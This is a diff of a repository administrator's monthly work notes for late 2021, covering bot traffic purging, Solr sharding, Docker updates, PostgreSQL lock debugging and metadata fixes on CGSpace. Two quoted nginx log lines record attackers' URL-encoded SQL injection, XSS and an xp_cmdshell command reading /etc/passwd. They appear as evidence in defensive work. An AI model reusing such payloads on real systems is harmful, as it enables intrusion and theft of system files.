- Udana from IWMI contacted me to ask if I could do a one-off AReS harvest because they have some new items they need to report on
## 2021-10-22
- Abenet and others contacted me to say that the LDAP login was not working on CGSpace
- I checked with `ldapsearch` and it is indeed not working:
```console
$ ldapsearch -x -H ldaps://AZCGNEROOT3.CGIARAD.ORG:636/ -b "dc=cgiarad,dc=org" -D "booo" -W "(sAMAccountName=fuuu)"
Enter LDAP Password:
ldap_bind: Invalid credentials (49)
additional info: 80090308: LdapErr: DSID-0C090447, comment: AcceptSecurityContext error, data 52e, v3839
```
- I sent a message to ILRI ICT to ask them to check the account
- They reset the password so I ran all system updates and rebooted the server since users weren't able to log in anyways
## 2021-10-24
- CIP was asking about CGSpace stats again
- The last time I helped them with this was in 2021-04, when I extracted stats for their community from the DSpace Statistics API
- In looking at the CIP stats request I got curious if there were any hits from all those Russian IPs before 2021-07 that I could purge
- Sure enough there were a few hundred IPs belonging to those ASNs:
```console
$ http 'localhost:8081/solr/statistics/select?q=time%3A2021-04*&fl=ip&wt=json&indent=true&facet=true&facet.field=ip&facet.limit=200000&facet.mincount=1' > /tmp/2021-04-ips.json
# Ghetto way to extract the IPs using jq, but I can't figure out how only print them and not the facet counts, so I just use sed
$ jq '.facet_counts.facet_fields.ip[]' /tmp/2021-04-ips.json | grep -E '^"' | sed -e 's/"//g' > /tmp/ips.txt
$ ./ilri/resolve-addresses-geoip2.py -i /tmp/ips.txt -o /tmp/2021-04-ips.csv
$ csvgrep -c asn -r '^(49453|46844|206485|62282|36352|35913|35624|8100)$' /tmp/2021-04-ips.csv | csvcut -c network | sed 1d | sort -u > /tmp/networks-to-block.txt
$ wc -l /tmp/networks-to-block.txt
125 /tmp/networks-to-block.txt
$ grepcidr -f /tmp/networks-to-block.txt /tmp/ips.txt > /tmp/ips-to-purge.txt
$ wc -l /tmp/ips-to-purge.txt
202
```
- Attempting to purge those only shows about 3,500 hits, but I will do it anyways
- Adding 64.39.108.48 from Qualys I get a total of 22631 hits purged
- I also purged another 5306 hits after checking the IPv4 list from AbuseIPDB.com
## 2021-10-25
- Help CIP colleagues with view and download statistics for their community in 2020 and 2021
## 2021-10-27
- Help ICARDA colleagues with GLDC reports on AReS
- There was an issue due to differences in CRP metadata between repositories
## 2021-10-28
- Meeting with Medha and a bunch of others about the FAIRscribe tool they have been developing
- Seems it is a submission tool like MEL
## 2021-10-29
- Linode alerted me that CGSpace (linode18) has high outbound traffic for the last two hours
- This has happened a few other times this week so I decided to go look at the Solr stats for today
- I see 93.158.91.62 is making thousands of requests to Discover with a normal user agent:
```
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
```
- Even more annoying, they are not re-using their session ID:
```console
$ grep 93.158.91.62 log/dspace.log.2021-10-29 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
4888
```
- This IP has made 36,000 requests to CGSpace...
- The IP is owned by [Internet Vikings](internetvikings.com) in Sweden
- I purged their statistics and set up a temporary HTTP 403 telling them to use a real user agent
- I see another one in Sweden a few days ago (192.36.109.131), also using the same exact user agent as above, but belonging to [Resilans AB](http://webb.resilans.se/)
- I purged another 74,619 hits from this bot
- I added these two IPs to the nginx IP bot identifier
- Jesus I found a few Russian IPs attempting SQL injection and path traversal, ie:
```
45.9.20.71 - - [20/Oct/2021:02:31:15 +0200] "GET /bitstream/handle/10568/1820/Rhodesgrass.pdf?sequence=4&OoxD=6591%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23 HTTP/1.1" 200 143070 "https://cgspace.cgiar.org:443/bitstream/handle/10568/1820/Rhodesgrass.pdf" "Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.8.1.11) Gecko/20071204 Ubuntu/7.10 (gutsy) Firefox/2.0.0.11"
```
- I reported them to AbuseIPDB.com and purged their hits:
```console
$ ./ilri/check-spider-ip-hits.sh -f /tmp/ip.txt -p
Purging 6364 hits from 45.9.20.71 in statistics
Purging 8039 hits from 45.146.166.157 in statistics
Purging 3383 hits from 45.155.204.82 in statistics
Total number of bot hits purged: 17786
```
## 2021-10-31
- Update Docker containers for AReS on linode20 and run a fresh harvest
- Found some strange IP (94.71.3.44) making 51,000 requests today with the user agent "Microsoft Internet Explorer"
- It is in Greece, and it seems to be requesting each item's XMLUI full metadata view, so I suspect it's Gardian actually
- I found it making another 25,000 requests yesterday...
- I purged them from Solr
- Found 20,000 hits from Qualys (according to AbuseIPDB.com) using normal user agents... ugh, must be some ILRI ICT scan
- Found more request from a Swedish IP (93.158.90.34) using that weird Firefox user agent that I noticed a few weeks ago:
```
Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0
```
- That's from ASN 12552 (IPO-EU, SE), which is operated by Internet Vikings, though AbuseIPDB.com says it's [Availo Networks AB](availo.se)
- There's another IP (3.225.28.105) that made a few thousand requests to the REST API from Amazon, though it's using a normal user agent
```console
# zgrep 3.225.28.105 /var/log/nginx/rest.log.* | wc -l
3991
~# zgrep 3.225.28.105 /var/log/nginx/rest.log.* | grep -oE 'GET /rest/(collections|handle|items)' | sort | uniq -c
3154 GET /rest/collections
427 GET /rest/handle
410 GET /rest/items
```
- It requested the [CIAT Story Maps](https://cgspace.cgiar.org/handle/10568/75560) collection over 3,000 times last month...
- I will purge those hits
<!-- vim: set sw=2 ts=2: -->

350
content/posts/2021-11.md Normal file
View File

@ -0,0 +1,350 @@
---
title: "November, 2021"
date: 2021-11-02T22:27:07+02:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2021-11-02
- I experimented with manually sharding the Solr statistics on DSpace Test
- First I exported all the 2019 stats from CGSpace:
```console
$ ./run.sh -s http://localhost:8081/solr/statistics -f 'time:2019-*' -a export -o statistics-2019.json -k uid
$ zstd statistics-2019.json
```
<!--more-->
- Then on DSpace Test I created a `statistics-2019` core with the same instance dir as the main `statistics` core (as [illustrated in the DSpace docs](https://wiki.lyrasis.org/display/DSDOC6x/Testing+Solr+Shards))
```console
$ mkdir -p /home/dspacetest.cgiar.org/solr/statistics-2019/data
# create core in Solr admin
$ curl -s "http://localhost:8081/solr/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>time:2019-*</query></delete>"
$ ./run.sh -s http://localhost:8081/solr/statistics-2019 -a import -o statistics-2019.json -k uid
```
- The key thing above is that you create the core in the Solr admin UI, but the data directory must already exist so you have to do that first in the file system
- I restarted the server after the import was done to see if the cores would come back up OK
- I remember last time I tried this the manually created statistics cores didn't come back up after I rebooted, but this time they did
## 2021-11-03
- While inspecting the stats for the new statistics-2019 shard on DSpace Test I noticed that I can't find any stats via the DSpace Statistics API for an item that _should_ have some
- I checked on CGSpace's and I can't find them there either, but I see them in Solr when I query in the admin UI
- I need to debug that, but it doesn't seem to be related to the sharding...
## 2021-11-04
- I spent a little bit of time debugging the Solr bug with the statistics-2019 shard but couldn't reproduce it for the few items I tested
- So that's good, it seems the sharding worked
- Linode alerted me to high CPU usage on CGSpace (linode18) yesterday
- Looking at the Solr hits from yesterday I see 91.213.50.11 making 2,300 requests
- According to AbuseIPDB.com this is owned by Registrarus LLC (registrarus.ru) and it has been reported for malicious activity by several users
- The ASN is 50340 (SELECTEL-MSK, RU)
- They are attempting SQL injection:
```console
91.213.50.11 - - [03/Nov/2021:06:47:20 +0100] "HEAD /bitstream/handle/10568/106239/U19ArtSimonikovaChromosomeInthomNodev.pdf?sequence=1%60%20WHERE%206158%3D6158%20AND%204894%3D4741--%20kIlq&isAllowed=y HTTP/1.1" 200 0 "https://cgspace.cgiar.org:443/bitstream/handle/10568/106239/U19ArtSimonikovaChromosomeInthomNodev.pdf" "Mozilla/5.0 (X11; U; Linux i686; en-CA; rv:1.8.0.10) Gecko/20070223 Fedora/1.5.0.10-1.fc5 Firefox/1.5.0.10"
```
- Another is in China, and they grabbed 1,200 PDFs from the REST API in under an hour:
```console
# zgrep 222.129.53.160 /var/log/nginx/rest.log.2.gz | wc -l
1178
```
- I will continue to split the Solr statistics back into year-shards on DSpace Test (linode26)
- Today I did all 2018 stats...
- I want to see if there is a noticeable change in JVM memory, Solr response time, etc
## 2021-11-07
- Update all Docker containers on AReS and rebuild OpenRXV:
```console
$ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
$ docker-compose build
```
- Then restart the server and start a fresh harvest
- Continue splitting the Solr statistics into yearly shards on DSpace Test (doing 2017, 2016, 2015, and 2014 today)
- Several users wrote to me last week to say that workflow emails haven't been working since 2021-10-21 or so
- I did a test on CGSpace and it's indeed broken:
```console
$ dspace test-email
About to send test email:
- To: fuuuu
- Subject: DSpace test email
- Server: smtp.office365.com
Error sending email:
- Error: javax.mail.SendFailedException: Send failure (javax.mail.AuthenticationFailedException: 535 5.7.139 Authentication unsuccessful, the user credentials were incorrect. [AM5PR0701CA0005.eurprd07.prod.outlook.com]
)
Please see the DSpace documentation for assistance.
```
- I sent a message to ILRI ICT to ask them to check the account/password
- I want to do one last test of the Elasticsearch updates on OpenRXV so I got a snapshot of the latest Elasticsearch volume used on the production AReS instance:
```console
# tar czf openrxv_esData_7.tar.xz /var/lib/docker/volumes/openrxv_esData_7
```
- Then on my local server:
```console
$ mv ~/.local/share/containers/storage/volumes/openrxv_esData_7/ ~/.local/share/containers/storage/volumes/openrxv_esData_7.2021-11-07.bak
$ tar xf /tmp/openrxv_esData_7.tar.xz -C ~/.local/share/containers/storage/volumes --strip-components=4
$ find ~/.local/share/containers/storage/volumes/openrxv_esData_7 -type f -exec chmod 660 {} \;
$ find ~/.local/share/containers/storage/volumes/openrxv_esData_7 -type d -exec chmod 770 {} \;
# copy backend/data to /tmp for the repository setup/layout
$ rsync -av --partial --progress --delete provisioning@ares:/tmp/data/ backend/data
```
- This seems to work: all items, stats, and repository setup/layout are OK
- I merged my [Elasticsearch pull request](https://github.com/ilri/OpenRXV/pull/126) from last month into OpenRXV
## 2021-11-08
- File [an issue for the Angular flash of unstyled content](https://github.com/DSpace/dspace-angular/issues/1391) on DSpace 7
- Help Udana from IWMI with a question about CGSpace statistics
- He found conflicting numbers when using the community and collection modes in Content and Usage Analysis
- I sent him more numbers directly from the DSpace Statistics API
## 2021-11-09
- I migrated the 2013, 2012, and 2011 statistics to yearly shards on DSpace Test's Solr to continute my testing of memory / latency impact
- I found out why the CI jobs for the DSpace Statistics API had been failing the past few weeks
- When I reverted to using the original falcon-swagger-ui project after they apparently merged my Falcon 3 changes, it seems that they actually only merged the Swagger UI changes, not the Falcon 3 fix!
- I switched back to using my own fork and now it's working
- Unfortunately now I'm getting an error installing my dependencies with Poetry:
```console
RuntimeError
Unable to find installation candidates for regex (2021.11.9)
at /usr/lib/python3.9/site-packages/poetry/installation/chooser.py:72 in choose_for
68│
69│ links.append(link)
70│
71│ if not links:
→ 72│ raise RuntimeError(
73│ "Unable to find installation candidates for {}".format(package)
74│ )
75│
76│ # Get the best link
```
- So that's super annoying... I'm going to try using Pipenv again...
## 2021-11-10
- 93.158.91.62 is scraping us again
- That's an IP in Sweden that is clearly a bot, but pretending to use a normal user agent
- I added them to the "bot" list in nginx so the requests will share a common DSpace session with other bots and not create Solr hits, but still they are causing high outbound traffic
- I modified the nginx configuration to send them an HTTP 403 and tell them to use a bot user agent
## 2021-11-14
- I decided to update AReS to the latest OpenRXV version with Elasticsearch 7.13
- First I took backups of the Elasticsearch volume and OpenRXV backend data:
```console
$ docker-compose down
$ sudo tar czf openrxv_esData_7-2021-11-14.tar.xz /var/lib/docker/volumes/openrxv_esData_7
$ cp -a backend/data backend/data.2021-11-14
```
- Then I checked out the latest git commit, updated all images, rebuilt the project:
```console
$ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
$ docker-compose build
$ docker-compose up -d
```
- Then I updated the repository configurations and started a fresh harvest
- Help Francesca from the Alliance with a question about embargos on CGSpace items
- I logged in as a normal user and a CGIAR user, and I was unable to access the PDF or full text of the item
- I was only able to access the PDF when I was logged in as an admin
## 2021-11-21
- Update all Docker images on AReS (linode20) and re-build OpenRXV
- Run all system updates and reboot the server
- Start a full harvest, but I notice that the number of items being harvested is not complete, so I stopped it
- Run all system updates on CGSpace (linode18) and DSpace Test (linode26) and reboot them
- ICT finally got back to use about the passwords for SMTP so I updated that and tested it to make sure it's working
- Some bot with IP 87.203.87.141 in Greece is making tons of requests to XMLUI with the user agent `Microsoft Internet Explorer`
- I added them to the list of IPs in nginx that get an HTTP 403 with a message to use a real user agent
- I will also purge all their requests from Solr:
```console
$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips -p
Purging 10893 hits from 87.203.87.141 in statistics
Total number of bot hits purged: 10893
```
- I did a bit more work documenting and tweaking the PostgreSQL configuration for CGSpace and DSpace Test in the Ansible infrastructure playbooks
- I finally deployed the changes on both servers
## 2021-11-22
- Udana asked me about validating on OpenArchives again
- According to my notes we actually completed this in 2021-08, but for some reason we are no longer on the list and I can't validate again
- There seems to be a problem with their website because every link I try to validate says it received an HTTP 500 response from CGSpace
## 2021-11-23
- Help RTB colleagues with thumbnail issues on their [2020 Annual Report](https://hdl.handle.net/10568/114576)
- The PDF seems to be in landscape mode or something and the first page is half width, so the thumbnail renders with the left half being white
- I generated a new one manually with libvips and it is better:
```console
$ vipsthumbnail AR\ RTB\ 2020.pdf -s 600 -o '%s.jpg[Q=85,optimize_coding,strip]'
```
- I sent an email to the OpenArchives.org contact to ask for help with the OAI validator
- Someone responded to say that there have been a number of complaints about this on the oai-pmh mailing list recently...
- I sent an email to Pythagoras from GARDIAN to ask if they can use a more specific user agent than "Microsoft Internet Explorer" for their scraper
- He said he will change the user agent
## 2021-11-24
- I had an idea to check our Solr statistics for hits from all the IPs that I have listed in nginx as being bots
- Other than a few that I ruled out that *may* be humans, these are all making requests within one month or with no user agent, which is highly suspicious:
```console
$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt
Found 8352 hits from 138.201.49.199 in statistics
Found 9374 hits from 78.46.89.18 in statistics
Found 2112 hits from 93.179.69.74 in statistics
Found 1 hits from 31.6.77.23 in statistics
Found 5 hits from 34.209.213.122 in statistics
Found 86772 hits from 163.172.68.99 in statistics
Found 77 hits from 163.172.70.248 in statistics
Found 15842 hits from 163.172.71.24 in statistics
Found 172954 hits from 104.154.216.0 in statistics
Found 3 hits from 188.134.31.88 in statistics
Total number of hits from bots: 295492
```
## 2021-11-27
- Peter sent me corrections for the authors that I had sent him back in 2021-09
- I did a quick sanity check on them with OpenRefine, filtering out all the metadata with no replacements, then ran through my csv-metadata-quality script
- Then I imported them into my local instance as a test:
```console
$ ./ilri/fix-metadata-values.py -i /tmp/authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t 'correct' -m 3
```
- Then I imported to CGSpace and started a full Discovery re-index:
```console
$ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
real 272m43.818s
user 183m4.543s
sys 2m47.988
```
## 2021-11-28
- Run system updates on AReS server (linode20) and update all Docker containers and reboot
- Then I started a fresh harvest as I always do on Sunday
- I am experimenting with pinning npm version 7 on OpenRXV frontend because of these Angular errors:
```console
npm WARN EBADENGINE Unsupported engine {
npm WARN EBADENGINE package: '@angular-devkit/architect@0.901.15',
npm WARN EBADENGINE required: { node: '>= 10.13.0', npm: '^6.11.0 || ^7.5.6', yarn: '>= 1.13.0' },
npm WARN EBADENGINE current: { node: 'v12.22.7', npm: '8.1.3' }
npm WARN EBADENGINE }
```
## 2021-11-29
- Tezira reached out to me to say that submissions on CGSpace are taking forever
- I see a definite increase in locks in the last few days:
![PostgreSQL locks week](/cgspace-notes/2021/11/postgres_locks_ALL-week.png)
- The locks are all held by dspaceWeb (XMLUI):
```console
$ psql -c "SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | sort | uniq -c | sort -n
1
1 ------------------
1 (1394 rows)
1 application_name
9 psql
1385 dspaceWeb
```
- I restarted PostgreSQL and the locks dropped down:
```console
$ psql -c "SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | sort | uniq -c | sort -n
1
1 ------------------
1 (103 rows)
1 application_name
9 psql
94 dspaceWeb
```
## 2021-11-30
- IWMI sent me ORCID identifiers for some new staff
- We currently have 1332 unique identifiers, so this adds sixteen new ones:
```console
$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml /tmp/iwmi-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2021-11-30-combined-orcids.txt
$ wc -l /tmp/2021-11-30-combined-orcids.txt
1348 /tmp/2021-11-30-combined-orcids.txt
```
- After I combined them and removed duplicates, I resolved all the names using my `resolve-orcids.py` script:
```console
$ ./ilri/resolve-orcids.py -i /tmp/2021-11-30-combined-orcids.txt -o /tmp/2021-11-30-combined-orcids-names.txt
```
- Then I updated some ORCID identifiers that had changed in the XML:
```console
$ cat 2021-11-30-fix-orcids.csv
cg.creator.identifier,correct
"ADEBOWALE AKANDE: 0000-0002-6521-3272","ADEBOWALE AD AKANDE: 0000-0002-6521-3272"
"Daniel Ortiz Gonzalo: 0000-0002-5517-1785","Daniel Ortiz-Gonzalo: 0000-0002-5517-1785"
"FRIDAY ANETOR: 0000-0003-3137-1958","Friday Osemenshan Anetor: 0000-0003-3137-1958"
"Sander Muilerman: 0000-0001-9103-3294","Sander Muilerman-Rodrigo: 0000-0001-9103-3294"
$ ./ilri/fix-metadata-values.py -i 2021-11-30-fix-orcids.csv -db dspace -u dspace -p 'fuuu' -f cg.creator.identifier -t 'correct' -m 247
```
- Tag existing items from the IWMI's new authors with ORCID iDs using `add-orcid-identifiers-csv.py` (7 new metadata fields added):
```console
$ cat 2021-11-30-add-orcids.csv
dc.contributor.author,cg.creator.identifier
"Liaqat, U.W.","Umar Waqas Liaqat: 0000-0001-9027-5232"
"Liaqat, Umar Waqas","Umar Waqas Liaqat: 0000-0001-9027-5232"
"Munyaradzi, M.","Munyaradzi Junia Mutenje: 0000-0002-7829-9300"
"Mutenje, Munyaradzi","Munyaradzi Junia Mutenje: 0000-0002-7829-9300"
"Rex, William","William Rex: 0000-0003-4979-5257"
"Shrestha, Shisher","Nirman Shrestha: 0000-0002-0996-8611"
$ ./ilri/add-orcid-identifiers-csv.py -i 2021-11-30-add-orcids.csv -db dspace -u dspace -p 'fuuu'
```
<!-- vim: set sw=2 ts=2: -->

396
content/posts/2021-12.md Normal file
View File

@ -0,0 +1,396 @@
---
title: "December, 2021"
date: 2021-12-01T16:07:07+02:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2021-12-01
- Atmire merged some changes I had submitted to the COUNTER-Robots project
- I updated our local spider user agents and then re-ran the list with my `check-spider-hits.sh` script on CGSpace:
```console
$ ./ilri/check-spider-hits.sh -f /tmp/agents -p
Purging 1989 hits from The Knowledge AI in statistics
Purging 1235 hits from MaCoCu in statistics
Purging 455 hits from WhatsApp in statistics
Total number of bot hits purged: 3679
```
<!--more-->
## 2021-12-02
- Francesca from Alliance asked me for help with approving a submission that gets stuck
- I looked at the PostgreSQL activity and the locks are back up like they were earlier this week
```console
$ psql -c "SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | sort | uniq -c | sort -n
1
1 ------------------
1 (1437 rows)
1 application_name
9 psql
1428 dspaceWeb
```
- Munin shows the same:
![PostgreSQL locks week](/cgspace-notes/2021/12/postgres_locks_ALL-week.png)
- Last month I enabled the `log_lock_waits` in PostgreSQL so I checked the log and was surprised to find only a few since I restarted PostgreSQL three days ago:
```console
# grep -E '^2021-(11-29|11-30|12-01|12-02)' /var/log/postgresql/postgresql-10-main.log | grep -c 'still waiting for'
15
```
- I think you could analyze the locks for the `dspaceWeb` user (XMLUI) and find out what queries were locking... but it's so much information and I don't know where to start
- For now I just restarted PostgreSQL...
- Francesca was able to do her submission immediately...
- On a related note, I want to enable the `pg_stat_statement` feature to see which queries get run the most, so I created the extension on the CGSpace database
- I was doing some research on PostgreSQL locks and found some interesting things to consider
- The default `lock_timeout` is 0, aka disabled
- The default `statement_timeout` is 0, aka disabled
- It seems to be recommended to start by setting `statement_timeout` first, rule of thumb [ten times longer than your longest query](https://github.com/jberkus/annotated.conf/blob/master/postgresql.10.simple.conf#L211)
- Mark Wood mentioned the `checker` cron job that apparently runs in one transaction and might be an issue
- I definitely saw it holding a bunch of locks for ~30 minutes during the first part of its execution, then it dropped them and did some other less-intensive things without locks
- Bizuwork was still not receiving emails even after we fixed the SMTP access on CGSpace
- After some troubleshooting it turns out that the emails from CGSpace were going in her Junk!
## 2021-12-03
- I see GARDIAN is now using a "GARDIAN" user agent finally
- I will add them to our local spider agent override in DSpace so that the hits don't get counted in Solr
## 2021-12-05
- Proof fifty records Abenet sent me from Africa Rice Center ("AfricaRice 1st batch Import")
- Fixed forty-six incorrect collections
- Cleaned up and normalize affiliations
- Cleaned up dates (extra `*` character in all?)
- Cleaned up citation format
- Fixed some encoding issues in abstracts
- Removed empty columns
- Removed one duplicate: Enhancing Rice Productivity and Soil Nitrogen Using Dual-Purpose Cowpea-NERICA® Rice Sequence in Degraded Savanna
- Added volume and issue metadata by extracting it from the citations
- All PDFs hosted on davidpublishing.com are dead...
- All DOIs linking to African Journal of Agricultural Research are dead...
- Fixed a handful of items marked as "Open Access" that are actually closed
- Added many missing ISSNs
- Added many missing countries/regions
- Fixed invalid AGROVOC terms and added some more based on article subjects
- I also made some minor changes to the [CSV Metadata Quality Checker](https://github.com/ilri/csv-metadata-quality)
- Added the ability to check if the item's title exists in the citation
- Updated to only run the mojibake check if we're not running in unsafe mode (so we don't print the same warning during both the check and fix steps)
- I ran the re-harvesting on AReS
## 2021-12-06
- Some minor work on the `check-duplicates.py` script I wrote last month
- I found some corner cases where there were items that matched in the database, but they were `in_archive=f` and or `withdrawn=t` so I check that before trying to resolve the handles of potential duplicates
- More work on the Africa Rice Center 1st batch import
- I merged the metadata for three duplicates in Africa Rice's items and mapped them on CGSpace
- I did a bit more work to add missing AGROVOC subjects, countries, regions, extents, etc and then uploaded the forty-six items to CGSpace
- I started looking at the seventy CAS records that Abenet has been working on for the past few months
## 2021-12-07
- I sent Vini from CGIAR CAS some questions about the seventy records I was working on yesterday
- Also, I ran the `check-duplicates.py` script on them and found that they might ALL be duplicates!!!
- I tweaked the script a bit more to use the issue dates as a third criteria and now there are less duplicates, but it's still at least twenty or so...
- The script now checks if the issue date of the item in the CSV and the issue date of the item in the database are less than 365 days apart (by default)
- For example, many items like "Annual Report 2020" can have similar title and type to previous annual reports, but are not duplicates
- I noticed a strange user agent in the XMLUI logs on CGSpace:
```console
20.84.225.129 - - [07/Dec/2021:11:51:24 +0100] "GET /handle/10568/33203 HTTP/1.1" 200 6328 "-" "python-requests/2.25.1"
20.84.225.129 - - [07/Dec/2021:11:51:27 +0100] "GET /handle/10568/33203 HTTP/2.0" 200 6315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/88.0.4298.0 Safari/537.36"
```
- I looked into it more and I see a dozen other IPs using that user agent, and they are all owned by Microsoft
- It could be someone on Azure?
- I opened [a pull request to COUNTER-Robots](https://github.com/atmire/COUNTER-Robots/pull/49) and I'll add this user agent to our local override until they decide to include it or not
- I purged 34,000 hits from this user agent in our Solr statistics:
```console
$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
Purging 34458 hits from HeadlessChrome in statistics
Total number of bot hits purged: 34458
```
- Meeting with partners about repositories in the One CGIAR
## 2021-12-08
- Finalize country/region changes in csv-metadata-quality checker and release v0.5.0: https://github.com/ilri/csv-metadata-quality/releases/tag/v0.5.0
- This also includes the mojibake fixes and title/citation checks and some bug fixes
## 2021-12-09
- Help Francesca upload the dataset for one CIAT publication (it has like 100 authors so we did it via CSV)
## 2021-12-12
- Patch OpenRXV's Elasticsearch for the CVE-2021-44228 log4j vulnerability and re-deploy AReS
- I added `-Dlog4j2.formatMsgNoLookups=true` to the Elasticsearch Java environment
- Run AReS harvesting
## 2021-12-13
- I ran the `check-duplicates.py` script on the 1,000 items from the CGIAR System Office TAC/ICW/Green Cover archives and found hundreds or thousands of potential duplicates
- I sent feedback to Gaia
- Help Jacquie from WorldFish try to find all outputs for the Fish CRP because there are a few different formats for that name
- Create a temporary account for Rafael Rodriguez on DSpace Test so he can investigate the submission workflow
- I added him to the admin group on the Alliance community...
## 2021-12-14
- I finally caught some stuck locks on CGSpace after checking several times per day for the last week:
```console
$ psql -c "SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | wc -l
1508
```
- Now looking at the locks query sorting by age of locks:
```console
$ cat locks-age.sql
SELECT a.datname,
l.relation::regclass,
l.transactionid,
l.mode,
l.GRANTED,
a.usename,
a.query,
a.query_start,
age(now(), a.query_start) AS "age",
a.pid
FROM pg_stat_activity a
JOIN pg_locks l ON l.pid = a.pid
ORDER BY a.query_start;
```
- The oldest locks are 9 hours and 26 minutes old and the time on the server is `Tue Dec 14 18:41:58 CET 2021`, so it seems something happened around 9:15 this morning
- I looked at the maintenance tasks and there is nothing running around then (only the sitemap update that runs at 8AM, and should be quick)
- I looked at the DSpace log, but didn't see anything interesting there: only editors making edits...
- I looked at the nginx REST API logs and saw lots of GET action there from Drupal sites harvesting us...
- So I'm not sure what it causing this... perhaps something in the XMLUI submission / task workflow
- For now I just ran all system updates and rebooted the server
- I also enabled Atmire's `log-db-activity.sh` script to run every four hours (in the DSpace user's crontab) so perhaps that will be better than me checking manually
- Regarding Gaia's 1,000 items to upload to CGSpace, I checked the eighteen Green Cover records and there are no duplicates, so that's at least a starting point!
- I sent her a spreadsheet with the eighteen items with a new collection column to indicate where they should go
## 2021-12-16
- Working on the CGIAR CAS Green Cover records for Gaia
- Add months to dcterms.issued from PDFs
- Add languages
- Format and fix several authors
- I created a SAF archive with SAFBuilder and then imported it to DSpace Test:
```console
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=fuuu@fuuu.com --source /tmp/SimpleArchiveFormat --mapfile=./2021-12-16-green-covers.map
```
## 2021-12-19
- I tried to update all Docker containers on AReS and then run a build, but I got an error in the backend:
```console
> openrxv-backend@0.0.1 build
> nest build
node_modules/@elastic/elasticsearch/api/types.d.ts:2454:13 - error TS2456: Type alias 'AggregationsAggregate' circularly references itself.
2454 export type AggregationsAggregate = AggregationsSingleBucketAggregate | AggregationsAutoDateHistogramAggregate | AggregationsFiltersAggregate | AggregationsSignificantTermsAggregate<any> | AggregationsTermsAggregate<any> | AggregationsBucketAggregate | AggregationsCompositeBucketAggregate | AggregationsMultiBucketAggregate<AggregationsBucket> | AggregationsMatrixStatsAggregate | AggregationsKeyedValueAggregate | AggregationsMetricAggregate
~~~~~~~~~~~~~~~~~~~~~
node_modules/@elastic/elasticsearch/api/types.d.ts:3209:13 - error TS2456: Type alias 'AggregationsSingleBucketAggregate' circularly references itself.
3209 export type AggregationsSingleBucketAggregate = AggregationsSingleBucketAggregateKeys
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Found 2 error(s).
```
- I'm not sure why because I build the backend successfully on my local machine...
- For now I just ran all the system updates and rebooted the machine (linode20)
- Then I started a fresh harvest
- Now I cleared all images on my local machine and I get the same error when building the backend
- It seems to be related to `@elastic/elasticsearch-js`](https://github.com/elastic/elasticsearch-js), which our `package.json` pins with version `^7.13.0`
- I see that AReS is currently using 7.15.0 in its `package-lock.json`, and 7.16.0 was released four days ago so perhaps it's that...
- Pinning `~7.15.0` allows nest to build fine...
- I made a pull request
- But since software sucks, now I get an error in the frontend while starting nginx:
```console
nginx: [emerg] host not found in upstream "backend:3000" in /etc/nginx/conf.d/default.conf:2
```
- In other news, looking at updating our Redis from version 5 to 6 (which is slightly less old, but still old!) and I'm happy to see that the [release notes for version 6](https://raw.githubusercontent.com/redis/redis/6.0/00-RELEASENOTES) say that it is compatible with 5 except for one minor thing that we don't seem to be using (SPOP?)
- For reference I see that our Redis 5 container is based on Debian 11, which I didn't expect... but I still want to try to upgrade to Redis 6 eventually:
```console
$ docker exec -it redis bash
root@23692d6b51c5:/data# cat /etc/os-release
PRETTY_NAME="Debian GNU/Linux 11 (bullseye)"
NAME="Debian GNU/Linux"
VERSION_ID="11"
VERSION="11 (bullseye)"
VERSION_CODENAME=bullseye
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"
```
- I bumped the version to 6 on my local test machine and the logs look good:
```console
$ docker logs redis
1:C 19 Dec 2021 19:27:15.583 # oO0OoO0OoO0Oo Redis is starting oO0OoO0OoO0Oo
1:C 19 Dec 2021 19:27:15.583 # Redis version=6.2.6, bits=64, commit=00000000, modified=0, pid=1, just started
1:C 19 Dec 2021 19:27:15.583 # Warning: no config file specified, using the default config. In order to specify a config file use redis-server /path/to/redis.conf
1:M 19 Dec 2021 19:27:15.584 * monotonic clock: POSIX clock_gettime
1:M 19 Dec 2021 19:27:15.584 * Running mode=standalone, port=6379.
1:M 19 Dec 2021 19:27:15.584 # Server initialized
1:M 19 Dec 2021 19:27:15.585 * Loading RDB produced by version 5.0.14
